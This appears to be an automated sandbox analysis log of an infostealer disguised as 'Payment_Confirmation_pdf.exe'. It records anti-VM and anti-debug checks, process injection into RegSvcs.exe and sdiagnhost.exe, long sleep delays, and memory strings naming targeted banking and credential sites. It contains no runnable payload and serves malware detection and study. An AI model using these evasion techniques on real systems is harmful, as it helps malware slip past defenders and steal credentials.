Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: cQwRvD.exe PID: 8128, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: 90F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: A0F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: A2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Memory allocated: B2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: 1770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: 5160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: 9350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: 79F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: A350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Memory allocated: B350000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 10_2_0146096E rdtsc

10_2_0146096E

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2978	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2477	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Window / User API: threadDelayed 9840

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.2 %

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008	Thread sleep count: 2477 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe TID: 1352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808	Thread sleep count: 133 > 30
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808	Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808	Thread sleep count: 9840 > 30
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6808	Thread sleep time: -19680000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CDYNVMware20,11696492231p
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: I130O15.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: I130O15.19.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: I130O15.19.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: I130O15.19.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rdVMware20,11696492231x
Source: I130O15.19.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: I130O15.19.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: I130O15.19.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169649223x
Source: sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mYtMtAAMpAtCOL.exe, 00000014.00000002.2560817786.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231~
Source: cQwRvD.exe, 0000000B.00000002.1596998361.000000000778E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SA
Source: I130O15.19.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: I130O15.19.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: I130O15.19.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: I130O15.19.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,1
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers - non-EU EuropeVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: active Brokers - EU WestVMware20,1169649
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: East & CentralVMware20,116964922O
Source: I130O15.19.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: I130O15.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: sdiagnhost.exe, 00000013.00000002.2568400764.00000000077D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231"
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: I130O15.19.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: I130O15.19.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: I130O15.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: firefox.exe, 00000016.00000002.1960517438.000001E6E71FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
Source: I130O15.19.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 10_2_0146096E rdtsc

10_2_0146096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 10_2_00417AC3 LdrLoadDll,

10_2_00417AC3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]	10_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]	10_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B4144 mov ecx, dword ptr fs:[00000030h]	10_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]	10_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B4144 mov eax, dword ptr fs:[00000030h]	10_2_014B4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B8158 mov eax, dword ptr fs:[00000030h]	10_2_014B8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426154 mov eax, dword ptr fs:[00000030h]	10_2_01426154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426154 mov eax, dword ptr fs:[00000030h]	10_2_01426154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141C156 mov eax, dword ptr fs:[00000030h]	10_2_0141C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov eax, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE10E mov ecx, dword ptr fs:[00000030h]	10_2_014CE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CA118 mov ecx, dword ptr fs:[00000030h]	10_2_014CA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CA118 mov eax, dword ptr fs:[00000030h]	10_2_014CA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CA118 mov eax, dword ptr fs:[00000030h]	10_2_014CA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CA118 mov eax, dword ptr fs:[00000030h]	10_2_014CA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E0115 mov eax, dword ptr fs:[00000030h]	10_2_014E0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01450124 mov eax, dword ptr fs:[00000030h]	10_2_01450124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E61C3 mov eax, dword ptr fs:[00000030h]	10_2_014E61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E61C3 mov eax, dword ptr fs:[00000030h]	10_2_014E61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0149E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0149E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E1D0 mov ecx, dword ptr fs:[00000030h]	10_2_0149E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0149E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149E1D0 mov eax, dword ptr fs:[00000030h]	10_2_0149E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F61E5 mov eax, dword ptr fs:[00000030h]	10_2_014F61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014501F8 mov eax, dword ptr fs:[00000030h]	10_2_014501F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01460185 mov eax, dword ptr fs:[00000030h]	10_2_01460185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014DC188 mov eax, dword ptr fs:[00000030h]	10_2_014DC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014DC188 mov eax, dword ptr fs:[00000030h]	10_2_014DC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C4180 mov eax, dword ptr fs:[00000030h]	10_2_014C4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C4180 mov eax, dword ptr fs:[00000030h]	10_2_014C4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]	10_2_014A019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]	10_2_014A019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]	10_2_014A019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A019F mov eax, dword ptr fs:[00000030h]	10_2_014A019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141A197 mov eax, dword ptr fs:[00000030h]	10_2_0141A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141A197 mov eax, dword ptr fs:[00000030h]	10_2_0141A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141A197 mov eax, dword ptr fs:[00000030h]	10_2_0141A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01422050 mov eax, dword ptr fs:[00000030h]	10_2_01422050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6050 mov eax, dword ptr fs:[00000030h]	10_2_014A6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144C073 mov eax, dword ptr fs:[00000030h]	10_2_0144C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A4000 mov ecx, dword ptr fs:[00000030h]	10_2_014A4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C2000 mov eax, dword ptr fs:[00000030h]	10_2_014C2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]	10_2_0143E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]	10_2_0143E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]	10_2_0143E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E016 mov eax, dword ptr fs:[00000030h]	10_2_0143E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141A020 mov eax, dword ptr fs:[00000030h]	10_2_0141A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141C020 mov eax, dword ptr fs:[00000030h]	10_2_0141C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B6030 mov eax, dword ptr fs:[00000030h]	10_2_014B6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A20DE mov eax, dword ptr fs:[00000030h]	10_2_014A20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141A0E3 mov ecx, dword ptr fs:[00000030h]	10_2_0141A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A60E0 mov eax, dword ptr fs:[00000030h]	10_2_014A60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014280E9 mov eax, dword ptr fs:[00000030h]	10_2_014280E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141C0F0 mov eax, dword ptr fs:[00000030h]	10_2_0141C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014620F0 mov ecx, dword ptr fs:[00000030h]	10_2_014620F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142208A mov eax, dword ptr fs:[00000030h]	10_2_0142208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B80A8 mov eax, dword ptr fs:[00000030h]	10_2_014B80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E60B8 mov eax, dword ptr fs:[00000030h]	10_2_014E60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E60B8 mov ecx, dword ptr fs:[00000030h]	10_2_014E60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
